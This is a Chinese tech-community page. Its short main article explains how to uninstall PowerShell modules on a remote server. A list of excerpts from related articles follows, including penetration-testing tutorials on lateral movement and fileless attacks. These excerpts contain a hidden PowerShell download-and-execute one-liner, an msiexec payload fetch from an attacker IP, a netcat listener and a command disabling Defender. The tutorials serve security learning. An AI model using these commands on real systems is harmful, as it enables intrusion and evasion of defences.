通过PowerShell从远程计算机上的服务器执行卸载设置

PowerShell是微软公司开发的一种命令行Shell和脚本语言，专门用于自动化任务和配置管理。通过PowerShell可以方便地远程管理Windows系统上的服务器。

从远程计算机上的服务器执行卸载设置，可以通过以下步骤完成：

首先，确保你的本地计算机已安装了PowerShell，并具备远程管理的权限。
打开PowerShell控制台，在命令行中输入以下命令，以建立与远程服务器的连接：

Enter-PSSession -ComputerName <服务器IP或主机名> -Credential <用户名>

其中，<服务器IP或主机名>是你要连接的远程服务器的IP地址或主机名，<用户名>是你用于登录服务器的用户名。

连接成功后，你可以使用以下命令在远程服务器上执行卸载设置：

Uninstall-Module -Name <模块名> -AllVersions -Force

其中，<模块名>是你要卸载的模块名称。

执行完毕后，你可以使用以下命令关闭与远程服务器的连接：

Exit-PSSession

PowerShell的优势在于其强大的脚本编写能力和丰富的命令集，可以方便地进行各种系统管理和配置任务。它广泛应用于Windows系统管理、自动化脚本、DevOps等领域。

腾讯云提供的云计算产品中，与PowerShell相关的产品包括弹性云服务器（ECS）和批量计算（BatchCompute）。你可以通过以下链接了解更多腾讯云相关产品的详细信息：

相关·内容

Windows服务器核心(Server-Core)安装与基础配置使用

相反，服务器核心旨在通过命令行、PowerShell 或 GUI 工具进行远程管理 (如 RSAT 或 Windows 管理中心) 。 Q: 服务器 (核心) vs Server 桌面体验?...要远程激活，请从远程计算机运行以下cmdlet： cscript windows\system32\slmgr.vbs :-ato 5...但默认情况下Windows Server 2019将外部远程桌面访问设置为禁用作为安全措施，我们可以轻松地从PowerShell中启用它。...远程管理描述: 您可以启用Windows PowerShell远程处理，即在一台计算机上的Windows PowerShell中键入的命令在另一台计算机上运行。...6) 使用 PowerShell 卸载 OpenSSH # - 7.使用 PowerShell 卸载 OpenSSH (如果在卸载时服务正在使用中，稍后可能需要重启 Windows。)

8.3K1 0

内网渗透之DCOM横向移动

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求 COM提供了一套允许在同一台计算机上的客户端和服务器之间进行通信的接口(运行在Windows95及之后版本的操作系统中)。...DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法攻击者在进行横向移动时...多了解一些横向移动方法，对日常的系统安全维护是大有益处的。使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。...调用Visio.Application远程执行命令适用条件：目标主机中安装有Visio # 通过PowerShell与DCOM进行远程交互，创建Visio.Application对象的实例: $com

2.2K2 0

Windows 使用 PowerShell 来管理另外一台 Windows 机器

简单来说 WinRM 是使用 HTTP 协议的，协议的端口是：5985。我们可以通过 WinRM 来在 powershell 上到远程计算机上执行相关命令。...可以理解为，就是远程计算机为你开放了一个 powershell 的执行环境。这个权限还是非常大的。...从上面的图片上我们可以看到，我们已经登录到一个另一个计算机中的环境中，并在本地计算机上使用 powershell 在远程计算机上执行命令。...WinRM 服务 WinRM 是 Windows 上自带的服务，这个服务需要在远程计算机上和本地计算机上都启动才可以。...很多人都知道要在服务器上设置 IP 白名单，但是客户端怎么都连不上，那是因为服务器的 IP 地址不在你客户端的 IP 地址白名单上面。

1.6K0 0

Win 独享 WSL 并搭配 Oh My Zsh

打开 PowerShell（或 Windows 命令提示符）并输入： wsl --install --install 命令执行以下操作：启用可选的 WSL 和虚拟机平台组件下载并安装最新 Linux...注销或卸载 Linux 发行版尽管可以通过 Microsoft Store 安装 Linux 发行版，但无法通过 Store 将其卸载。...注销并卸载 WSL 发行版： wsl --unregister WSL 文件位置一个重要的注意事项：启用 WSL 并安装 Linux 发行版时，将安装与计算机上的...除了 Remote - SSH 和 Remote - Containers 扩展之外，此扩展包还包含 Remote - WSL 扩展，使你能够打开容器中、远程计算机上或 WSL 中的任何文件夹。...从 VS Code 中还可以通过使用 VS Code 中的快捷方式 CTRL+SHIFT+P 调出命令面板，以访问更多 VS Code 远程选项。

3.4K2 0

内网渗透测试：利用DCOM进行横向渗透

利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。 DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM 使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法。...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。...使用DCOM对远程主机执行命令下面通过几个实验来演示如何使用DCOM在远程主机上面执行命令。在使用该方法时，需要具有以下条件：具有管理员权限的PowerShell 可能需要关闭目标系统的防火墙。...最后进入Windows7的powershell，控制Windows7对Windows Server 2008执行远程命令，执行位于Windows Server 2008的c盘里的马： # 通过PowerShell

2.6K2 0

使用 Ansible 批量管理 Windows

概述安装指南 服务器端的要求 服务器端安装Ansible 通过Apt (Ubuntu)安装最新版本 Windows 指南设置Windows...安装指南本次在Ubuntu上安装Ansible 2.7 服务器端的要求目前Ansible可以从安装了Python 2（2.7版）或Python 3（3.5及更高版本）的任何机器上运行。...服务器端安装Ansible 通过Apt (Ubuntu)安装最新版本这里有一个PPA版本的Ubuntu源。...要在您的计算机上配置PPA并安装ansible，请运行以下命令： sudo apt-get update sudo apt-get install software-properties-common...如果未安装此补丁，Ansible将无法在Windows主机上执行某些命令。这些补丁应作为系统引导或映像过程的一部分安装。

3.3K3 0

内网渗透｜利用 WinRM 进行横向渗透

使用 WinRM 我们可以在远程主机设置了防火墙的情况下远程管理这台服务器，因为启动 WinRM 服务后，防火墙默认会自动放行 5985 端口。...使用 winrm 命令我们也可以直接通过 winrm 命令执行远程主机上的程序，通常是木马程序，这里我们尝试执行启动一个计算器： winrm invoke create wmicimv2/win32_...calc 进程： image-20210804214037070 使用 Invoke-Command 命令 Invoke-Command 是 PowerShell 上的一个命令，用来在本地或远程计算机上执行命令...•-Credential：指定有权连接到远程计算机的用户的帐户。•-Command：指定需要执行的命令。 image-20210804215420172 如上图所示，成功在远程主机上执行命令。...在会话期间，您键入的命令在远程计算机上运行，就像您直接在远程计算机上键入一样。

5.1K4 0

初探伪装在Office宏里的反弹Shell

0x1 主要思路宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。...我们通过工具生成一个有powershelldownloader功能的一个excel，victim服务器打开此excel之后会从CC服务器下载并执行一个基于powershell的payload到本地的计算机后就可以通过...待用户执行了宏代码之后，会调用windows系统的当中的wmi拉起powershell进行下载并连接远程CC端。关键代码如下： ? 可以在第一个powershell.exe的启动参数找到痕迹 ?...之后在执行了shell命令执行，第二个powershell.exe会主动拉起一个cmd.exe 进行远程命令执行。...攻击者从远程获取恶意软件或者攻击负载powershell脚本经过混淆之后进行base64编码，对于检测这些攻击行为无论是静态扫描还是动态检测都造成了一定的难度。

1.3K2 0

WindowsLinux文件下载方式汇总

当然，你也可以通过以下命令来远程执行命令，且无文件落地： powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring...FTP协议包括两个组成部分，其一为FTP服务器，其二为FTP客户端，其中FTP服务器用来存储文件，用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。...在我们渗透测试过程中我们可以通过在攻击主机上搭建FTP服务，之后在目标主机上通过cmd下的ftp进行远程连接: 首先，在攻击主机使用IPOP启动一个简易的FTP服务： ?...msiexec msiexec是windows自带的cmd工具，支持远程下载功能，攻击者可以将msi文件上传到服务器并执行，下面通过一个实例做演示说明，首先我们通过msfvenom来构造一个恶意的msi...应用程序 wget wget 是一个从网络上自动下载文件的自由工具，支持通过 HTTP、HTTPS、FTP 三个最常见的 TCP/IP协议下载，并可以使用HTTP 代理。"

2K5 0

PS命令之操作系统远程管理及进程服务操作示例

描述: 该cmdlet将计算机配置为接收通过使用WS-Management技术发送的PowerShell远程命令。...-Force # 在计算机位于公用网络上时在Windows客户端版本上启用PowerShell远程处理 # 在此计算机上设置了 WinRM 以接收请求。...该cmdlet阻止对本地计算机上所有PowerShell版本和更高会话会话配置的远程访问,同样需要使用“以管理员身份运行” 选项启动。...描述: 从Windows PowerShell 3.0开始，您可以等待重新启动完成，然后再运行下一个命令。指定等待超时和查询间隔，并等待重新启动的计算机上的特定服务可用。...Start-Process 命令 - 启动在本地计算机或远程计算机未运行进程 Stop-Process 命令 - 停止在本地计算机或远程计算机上运行的进程 Wait-Process 命令 - 使在本地计算机或远程计算机上运行的进程等待

7.2K4 0

1.Powershell基础入门介绍与安装升级

通过 Winget 安装 PowerShell : 通过 winget 命令行工具，开发人员可以在 Windows 10 计算机上查找、安装、升级、删除和配置应用程序。...从 Microsoft Store 安装 Tips : 如何创建远程处理终结点?...独立的安装路径和可执行文件名独立的 PSModulePath 每个版本的独立配置文件提升了模块兼容性新增了远程处理终结点组策略支持独立的事件日志操作步骤: Step 1.独立的安装路径和可执行文件名...包含组策略设置，有助于为企业环境中的服务器定义一致的选项值 # 1.设置包括： * 控制台会话配置：设置运行 PowerShell 的配置终结点。...* 启用 Power Shell 脚本块日志记录：启用所有 PowerShell 脚本的详细日志记录。 * 启用脚本执行：设置 PowerShell 执行策略。

7.1K2 0

利用资源约束委派进行的提权攻击分析

通过搭建一个NTLM中继服务器，将NTLM认证中继到域控制器的LDAP服务上以计算机账户权限为自身设置基于资源的约束委派，便能完成上文中设置服务B委派设置的工作。攻击实现 1....以上的实验是当我们已经拥有两台域内计算机的普通用户权限，且管理员已经开启了Powershell远程管理服务时，我们可以通过基于资源的约束委派从普通域用户变为域管理员。...为了弄清楚连接后拒绝访问的原因，我们必须先明白Powershell是在会话中是如何工作的。在PSSession中，Powershell是通过委派用户凭证的方式让用户在远程计算机上执行任务的。...用户从计算机A创建会话连接到计算机B，Powershell通过委派，使得计算机B以用户身份执行任务，好像就是用户自己在执行一样。此时，用户试图与其他计算机C建立连接，得到的却是红色的拒绝访问。...Powershell Remoting通过委派用户凭证的方式使用户在远程计算机上执行任务，本质上却是远程计算机模拟用户进行操作，如果该计算机并没有被配置委派，登录到Powershell会话中的用户无则法再次使用自己凭证请求访问其他远程计算机

2.8K2 0

横向渗透之

判断能否直接登录通过上述步骤确定用户及密码后，如果用户是管理员组的可以直接通过别的方式在远程主机上执行命令或者反弹shell，利用query user查看在线的用户或者利用...tasklist查看远程主机上的进程是否有目标用户的进行判断。...关闭 RDP 安全认证当服务器开启安全认证时，必须先通过登陆密码才能进入远程桌面；如果服务端用的是不安全的认证方式，即可以先远程链接后登陆可以触发Shift后门 ?...如何设置不安全的连接，去掉”仅允许使用网络级别的身份验证的远程桌面的计算机连接”选项，需要注意的是先上系统后验证也会在计算机本地留下一定的进程、日志。 ? 2....-u # 卸载（4）SharpDoor：仅使用于Win 10 开启多会话RDP 五、RDP 服务器反打客户端需要客户端RDP链接时，开启磁盘共享（将本地磁盘挂在到服务器上）才能正常利用 ?

2.4K1 0

无文件落地攻击

Powershell的强大功能一方面为Windows平台开发人员提供了便捷性，但同时也为安全研究人员打开了一条新的道路，下面我们简单的介绍一下如何通过powershell来实现无文件落地攻击，具体的步骤如下...Step 2：使用python开启一个简易的web服务器用于托管msi载荷 ? Step 3：在攻击主机上使用nc监听端口 nc -lvp 6666 ?...hta文件，之后通过目标主机的mshta来远程下载并执行，从而实现无文件落地攻击，下面是具体的步骤： Step 1：使用msf的exploit/windows/misc/hta_server模块进行测试...WinRM WinRM是Windows Remote Managementd的缩写，是一种允许管理员远程执行系统管理任务的服务，通信通过http(5985)或https soap(5986)执行，默认情况下支持...Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件并执行达到CS上线的目的，更多的方法与技巧尽在探索中......

2K4 0

PowerShell 降级攻击的检测与防御

不一定，因为我们知道 powershell V2 不记录任何日志，而且每个主机上都安装了 powershell V2，尽管只是附带安装了相应的 .NET 框架而且并未默认使用。...V2 那么就可以跳过此过程，通常卸载 powershell V2 可以在控制面板中通过程序和功能手动卸载，也可以使用下面的 powershell 命令来卸载： Disable-WindowsOptionalFeature...Invoke-Command命令来卸载远程主机的 powershell V2： Invoke-Command -Computer WKS1 -ScriptBlock { Disable-WindowsOptionalFeature...从记录 4688 事件到 EventSentry 看到闭关分析事件之间会有一定的时间差，从理论上讲，部分脚步可能已经在执行。...规避如果攻击者使通过 powershell.exe 以外的二进制文件进行执行powershell 代码，仍然可以规避 powershell.exe 的检测规则，因为 powershell.exe 本质上是默认执行

2.3K0 0

红蓝对抗之无文件落地攻击

服务器用于托管shell.exe python2 -m SimpleHTTPServer 1234 Step 4：之后在目标主机中使用powershell执行以下命令，实现无文件落地攻击 powershell...服务器用于托管msi载荷 Step 3：在攻击主机上使用nc监听端口 nc -lvp 6666 Step 4：在目标主机中执行以下命令实现无文件落地执行载荷 msiexec /q /i http://192.168.174.129....HTA文件，我们可以在本地构建hta文件，之后通过目标主机的mshta来远程下载并执行，从而实现无文件落地攻击，下面是具体的步骤： Step 1：使用msf的exploit/windows/misc/...WinRM WinRM是Windows Remote Managementd的缩写，是一种允许管理员远程执行系统管理任务的服务，通信通过http(5985)或https soap(5986)执行，默认情况下支持..."来实现远程下载恶意文件并执行达到CS上线的目的，更多的方法与技巧尽在探索中......

1641 0

四十六.Powershell和PowerSploit脚本攻防万字详解

一旦攻击者可以在一台计算机上运行代码，就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写到磁盘中执行，它就可以直接在内存中运行。...Empire基于PowerShell的远程控制木马，可以从凭证数据库中导出和跟踪凭据信息，常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制。...各Windows操作系统的PowerShell版本如下：一旦攻击者在一台计算机上运行代码，他们就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写道磁盘中执行，就可以直接在内存中运行...powershell Set-MpPreference -disablerealtimeMonitoring $true 在CMD窗口下执行，将远程主机上的test.exe下载到本地。...service apache2 start 在本地浏览器中用IP地址访问，证明我们的Apache服务器设置成果。

5191 0

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

3K3 0

域内横向移动分析及防御

，可以在远程计算机上执行命令，也可以将管理员权限提升到System权限以运行指定的程序可以在Windows server 2016 及以前使用下载地址：https://download.sysinternals.com.../files/PSTools.zip PsExec的基本原理是：通过管道在远程目标计算机上创建一个psexec服务，并在本地磁盘中生成一个名为“PSEXECSVC”的二进制文件，然后通过psexec服务运行命令...基于组件对象模型（COM），COM提供了一套允许在同一台计算机上的客户端和服务端之间进行通信的接口（Win95及之后）客户端程序对象能够对网络中的另一台计算机上的服务器程序对象发送请求执行流程同样...：通过ipc$连接远程计算机执行命令 1、通过本地DCOM执行命令获取DCOM程序列表： // Get-CimInstance在PowerShell 3.0上才有，即server2012及以上 Get-CimInstance...、Exchange邮件服务器安全防范电子邮件中可能包含大量的源码、企业内部通讯录、明文密码、敏感业务登陆地址及可以从外网访问内网的V**账号密码等信息 Exchange支持PowerShell对其进行本地或远程操作

1.5K1 1

Powershell进阶学习(3) Po

但是在2008版本开始已经发展的相当好了---因为有了powershell。 windows 远程操作主要依赖WinRM或叫做WS管理协议，使用443端口。...如果在服务器比较多的情况下可通过组策略实现。一开启的方法 ? 二功能开启了那么我们怎么使用它呢，下面会我会举几个例子。...（1）一对一管理远程计算机，登陆一台域控制器服务器，需要使用Enter-PSSession： ? 可以看到我已经成功登陆到了bjdc01这台服务器上并用ls命令查看了一下它D盘的内容。...（2）但是我不想登陆到计算机上再去执行命令，能不能直接通过命令查看当然是可以的。这个需要invoke-command命令。 ? 通过这个命令我们可以看到服务器上最新的关于system的三个日志 ?...我通过远程的方式在bjdc01上设置了一个变量，但当我在此运行的时候发现它居然失效了。这是什么原因呢？好吧请继续关注关于接下来的session的介绍吧。

5192 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云